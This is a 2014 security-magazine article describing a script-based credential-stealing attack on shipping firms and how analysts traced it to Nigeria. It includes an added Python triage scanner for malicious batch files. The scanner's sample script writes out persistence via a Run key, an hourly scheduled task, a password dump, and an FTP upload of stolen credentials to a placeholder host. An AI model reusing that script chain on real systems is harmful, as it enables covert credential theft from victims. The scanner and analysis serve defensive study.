The initial attack arrives as an email attachment. The file carries a PDF icon but is named “Document.exe.” When it is opened, a black PDF document is displayed and nothing else visible happens. The clever part of this attack is that, strictly speaking, it uses no malware at all to perform its malicious actions: every component is either a script or a legitimate tool.

The original file is an installer. It contains a number of files, and all it does on the computer is create a folder, unpack those files into it, execute one of them and exit. That starts the “infection” process, in which a number of different script files run one after another, each performing only a few tasks so as not to raise any alarm and to go unnoticed. Those tasks range from creating registry entries that make the scripts run every time the computer starts, to stealing all of the credentials saved in browsers and email clients (using legitimate freeware tools that let users recover their saved passwords), to uploading them to an FTP server.

And that is it: an easy way to steal credentials without using any “real” malware. The credential-harvesting routine runs every hour to capture any new username and password saved on the system.

Who is Behind this Attack?

One of the weaknesses of this approach is the way the stolen credentials are sent. The upload is done with the FTP command from one of the .bat files, and that same command carries the user name and password for the FTP account in clear text. That is how the malware analysts were ultimately able to log in to the server and download all of the files.
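Everything the scripts need (the FTP host, the account, the password, the Run-key entry) is written in clear text into the batch files, which is both what makes the infection chain above work and what handed the analysts the server. As an added example, not code from the article or from the analysts who worked the case, the following Python triage scanner reads a .bat file, reconstructs the FTP command file the script stages with `echo ... >> file`, finds the `ftp -s:` upload and pulls out the host, user name and password, and also reports Run-key persistence and scheduled tasks. The sample batch script, the host name, the credentials and the `recover_passwords.exe` tool name in it are constructed placeholders, not indicators from the case.

```python
"""Triage scanner for the batch-script tradecraft described above.
Given the text of a .bat file, it reconstructs any FTP command file the
script builds with `echo ... >> file`, finds the `ftp -s:file` upload, and
reports the hard-coded host, user name and password, together with
Run-key persistence entries and scheduled tasks.
Added example: this is not code from the article or from the analysts.
The sample script, host name and credentials below are constructed
placeholders for the example, not indicators from the case."""
import re
from collections import defaultdict

# `echo TEXT> FILE` and `echo TEXT>> FILE`: how the scripts stage the FTP command file
ECHO_RE = re.compile(r"^\s*echo\s+(?P<text>.*?)\s*>>?\s*(?P<file>\S+)\s*$", re.I)
# `ftp -s:FILE`: ftp.exe reads its commands (and the login) from FILE
FTP_RE = re.compile(r"^\s*ftp(?:\.exe)?\s+.*?-s:(?P<file>\S+)", re.I)
# `reg add "HK..\Run"`: run-at-boot persistence (Run and RunOnce keys)
RUNKEY_RE = re.compile(r'^\s*reg(?:\.exe)?\s+add\s+"?(?P<key>[^"\s]*\\Run(?:Once)?)"?', re.I)
# `schtasks /create ... /sc hourly`: one way to get the hourly re-harvest
SCHTASK_RE = re.compile(r"^\s*schtasks(?:\.exe)?\s+/create\b.*?/sc\s+(?P<sched>\w+)", re.I)


def parse_ftp_script(lines):
    """Pull host, login and uploaded files out of a Windows `ftp -s:` command file.

    After `open HOST`, ftp.exe prompts for the user name and password and
    reads them from the next two script lines; scripts started with `ftp -n`
    use an explicit `user NAME PASS` line instead. Both forms are handled.
    """
    creds = {"host": None, "user": None, "password": None, "uploads": []}
    i = 0
    while i < len(lines):
        tokens = lines[i].split()
        verb = tokens[0].lower() if tokens else ""
        if verb == "open" and len(tokens) > 1:
            creds["host"] = tokens[1]
            nxt = lines[i + 1].split() if i + 1 < len(lines) else []
            if nxt and nxt[0].lower() == "user":
                creds["user"] = nxt[1] if len(nxt) > 1 else None
                creds["password"] = nxt[2] if len(nxt) > 2 else None
                i += 2
            else:
                creds["user"] = lines[i + 1].strip() if i + 1 < len(lines) else None
                creds["password"] = lines[i + 2].strip() if i + 2 < len(lines) else None
                i += 3
            continue
        if verb in ("put", "mput", "send") and len(tokens) > 1:
            creds["uploads"].append(tokens[1])
        i += 1
    return creds


def scan_batch(text):
    """Scan one .bat file and return persistence, scheduling and exfil findings."""
    staged = defaultdict(list)  # file name -> lines echoed into it, in order
    findings = {"persistence": [], "scheduled": [], "exfil": []}
    for raw in text.splitlines():
        line = raw.strip()
        if m := ECHO_RE.match(line):
            staged[m["file"].lower()].append(m["text"])
        elif m := RUNKEY_RE.match(line):
            findings["persistence"].append(m["key"])
        elif m := SCHTASK_RE.match(line):
            findings["scheduled"].append(m["sched"].lower())
        elif m := FTP_RE.match(line):
            # the command file was written earlier in the same script, so the
            # credentials can be recovered without ever running anything
            findings["exfil"].append(parse_ftp_script(staged.get(m["file"].lower(), [])))
    return findings


# Constructed sample in the style the article describes (placeholder values,
# including the credential-recovery tool name).
SAMPLE_BAT = r"""@echo off
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v svc /t REG_SZ /d "%APPDATA%\svc\run.bat" /f
schtasks /create /sc hourly /tn svc /tr "%APPDATA%\svc\steal.bat" /f
recover_passwords.exe /stext %TEMP%\creds.txt
echo open ftp.example.invalid> %TEMP%\f.txt
echo dropuser>> %TEMP%\f.txt
echo Pass-123>> %TEMP%\f.txt
echo put %TEMP%\creds.txt>> %TEMP%\f.txt
echo bye>> %TEMP%\f.txt
ftp -s:%TEMP%\f.txt
del %TEMP%\f.txt
"""

if __name__ == "__main__":
    for category, items in scan_batch(SAMPLE_BAT).items():
        print(f"{category}: {items}")
```

Because the scanner only reads the script, it can be run over every .bat file recovered from an infected host or a sandbox without executing anything; the recovered host and account are then the lead for takedown requests and for checking which victims' credential files are already sitting on the server.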


The criminals behind this attack were using a free FTP service, and with those same credentials the analysts could log in to its control panel, where all of the information the attackers had entered to obtain the free FTP account was visible: first and last name, country, city, zip code and email address.

Of course this information was false. But it became interesting when the city listed turned out to be Ikeja, a suburb of Lagos, Nigeria’s largest city. Ikeja is known as the “Computer Village” for its large computer market. This did not mean the criminals were from Ikeja, but it at least implied they were either from Nigeria or knew the region.

The one determining factor in breaking the case was the fraudster’s email address. This was the only piece of information that had to be real, since it was needed to activate the account.

It was a Gmail account, and after some investigation, it was discovered that the person was
indeed from Ikeja.

The analysts were able to identify the person as the owner of a shipping company in Nigeria. He was stealing the credentials to obtain, from the affected companies, documents with details of real oil cargo manifests. He intended to present that documentation as proof of product to the victims he would then try to scam.

The shipping companies infected by this malware are all around the world, but most of them
were in Europe. The difficulty is that some of the companies have been hesitant to come
35 Cyber Warnings E-Magazine – November 2014 Edition
Copyright © Cyber Defense Magazine, All rights reserved worldwide
